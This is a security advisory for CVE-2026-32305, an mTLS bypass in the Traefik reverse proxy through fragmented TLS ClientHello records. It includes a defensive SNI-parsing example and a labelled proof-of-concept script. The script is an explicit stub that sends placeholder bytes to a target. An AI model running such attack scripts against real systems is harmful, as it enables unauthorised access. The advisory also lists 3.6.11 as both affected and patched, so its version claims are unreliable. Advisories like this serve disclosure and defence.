Security Vulnerability Report
CVE-2026-32305 CVSS 5.3 MEDIUM

CVE-2026-32305

Published: 2026-03-20 11:18:02
Last Modified: 2026-03-24 15:15:56

Description

Traefik is an HTTP reverse proxy and load balancer. Versions 2.11.40 and below, 3.0.0-beta1 through 3.6.11, and 3.7.0-ea.1 are vulnerable to mTLS bypass through the TLS SNI pre-sniffing logic related to fragmented ClientHello packets. When a TLS ClientHello is fragmented across multiple records, Traefik's SNI extraction may fail with an EOF and return an empty SNI. The TCP router then falls back to the default TLS configuration, which does not require client certificates by default. This allows an attacker to bypass route-level mTLS enforcement and access services that should require mutual TLS authentication. This issue is patched in versions 2.11.41, 3.6.11 and 3.7.0-ea.2.
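To make the failure mode concrete from the defender's side, here is an added example (not Traefik's code): a Python SNI extractor that joins handshake fragments across TLS records before parsing and returns None for a ClientHello that is still incomplete, so the caller can fail closed instead of falling back to a default TLS configuration that does not require client certificates. The ClientHello builder, the record splitter and the host name are constructed here only to exercise the parser.

```python
import struct
HANDSHAKE, CLIENT_HELLO, EXT_SERVER_NAME = 22, 1, 0  # TLS content / handshake / extension types

def tls_records(data):
    """Yield (content_type, fragment) for every complete TLS record in data."""
    off = 0
    while off + 5 <= len(data):
        ctype, _version, length = struct.unpack("!BHH", data[off:off + 5])
        if off + 5 + length > len(data):
            break                                   # truncated record: stop, do not guess
        yield ctype, data[off + 5:off + 5 + length]
        off += 5 + length

def extract_sni(data):
    """Return the SNI host name, or None if the ClientHello is incomplete or malformed.
    Handshake fragments are joined first, so a split ClientHello parses like a whole one."""
    hs = b"".join(frag for ctype, frag in tls_records(data) if ctype == HANDSHAKE)
    if len(hs) < 4 or hs[0] != CLIENT_HELLO:
        return None
    body_len = int.from_bytes(hs[1:4], "big")
    if len(hs) < 4 + body_len:
        return None                                 # more records needed: fail closed
    body = hs[4:4 + body_len]
    try:
        p = 2 + 32                                  # client_version + random
        p += 1 + body[p]                            # session_id
        p += 2 + int.from_bytes(body[p:p + 2], "big")  # cipher_suites
        p += 1 + body[p]                            # compression_methods
        end = p + 2 + int.from_bytes(body[p:p + 2], "big")
        p += 2
        while p + 4 <= end:                         # walk the extension list; no match -> None
            etype, elen = struct.unpack("!HH", body[p:p + 4])
            if etype == EXT_SERVER_NAME:            # list_len(2) name_type(1) name_len(2) name
                n = int.from_bytes(body[p + 7:p + 9], "big")
                return body[p + 9:p + 9 + n].decode("ascii")
            p += 4 + elen
    except (IndexError, struct.error, UnicodeDecodeError):
        return None

def build_client_hello(host):
    """Constructed minimal ClientHello (one cipher suite, SNI as the only extension)."""
    name = host.encode("ascii")
    sni = struct.pack("!HHHBH", EXT_SERVER_NAME, len(name) + 5, len(name) + 3, 0, len(name)) + name
    body = b"\x03\x03" + bytes(32) + b"\x00" + b"\x00\x02\x13\x01" + b"\x01\x00" + struct.pack("!H", len(sni)) + sni
    return bytes([CLIENT_HELLO]) + len(body).to_bytes(3, "big") + body

def to_records(handshake, split_at=None):
    """Wrap a handshake message in one TLS record, or in two when split_at is given."""
    parts = [handshake] if split_at is None else [handshake[:split_at], handshake[split_at:]]
    return b"".join(b"\x16\x03\x01" + struct.pack("!H", len(p)) + p for p in parts)
```

A None result should be handled like an unknown SNI (reject, or apply the strictest route's client-certificate requirement), never by selecting the default TLS options.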

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* - VULNERABLE (Traefik <= 2.11.40)
cpe:2.3:a:traefik:traefik:*:*:*:*:*:*:*:* - VULNERABLE (3.0.0-beta1 <= Traefik <= 3.6.11)
cpe:2.3:a:traefik:traefik:3.7.0:ea1:*:*:*:*:*:* - VULNERABLE (Traefik 3.7.0-ea.1)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# Proof of Concept for CVE-2026-32305
# This script demonstrates how to send a fragmented ClientHello
# to bypass mTLS checks in vulnerable Traefik versions.
import socket
import struct


def send_fragmented_clienthello(target_ip, target_port):
    # Standard TCP connection
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target_ip, target_port))

    # In a real exploit, these bytes would be a valid TLS ClientHello
    # split into two records. The SNI should be in the second record
    # or split across the boundary to trigger the EOF in SNI extraction.

    # Record 1: Partial ClientHello (Header + partial payload)
    # Content type: Handshake (0x16)
    # Version: TLS 1.2 (0x03, 0x01)
    # Length: Length of fragment 1
    fragment_1 = bytes.fromhex("16030100 01")  # Simplified header

    # Record 2: Rest of ClientHello (containing SNI)
    fragment_2 = bytes.fromhex("16030100 02")  # Simplified header

    # Send fragments
    s.send(fragment_1)
    s.send(fragment_2)

    # Check if server responds without requesting a client certificate
    response = s.recv(4096)
    if response:
        print("[+] Connection established. Check if mTLS was bypassed.")
    s.close()


# Usage: send_fragmented_clienthello('127.0.0.1', 443)
```

References

https://github.com/traefik/traefik/releases/tag/v2.11.41 (Release Notes)
https://github.com/traefik/traefik/releases/tag/v3.6.11 (Release Notes)
https://github.com/traefik/traefik/releases/tag/v3.7.0-ea.2 (Release Notes)
https: ... (truncated)

Additional NVD Record Fields

Vulnerability Status: Analyzed
Weaknesses: CWE-287, CWE-1188
CPE version constraints: < 2.11.41; 3.0.0 to 3.6.11 (inclusive); 3.7.0 ea1
CVSS v3.1 (Primary): 5.3 MEDIUM, Exploitability Score 3.9, Impact Score 1.4
CVSS v4.0 (Secondary): 7.8 HIGH
CVSS v4.0 Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X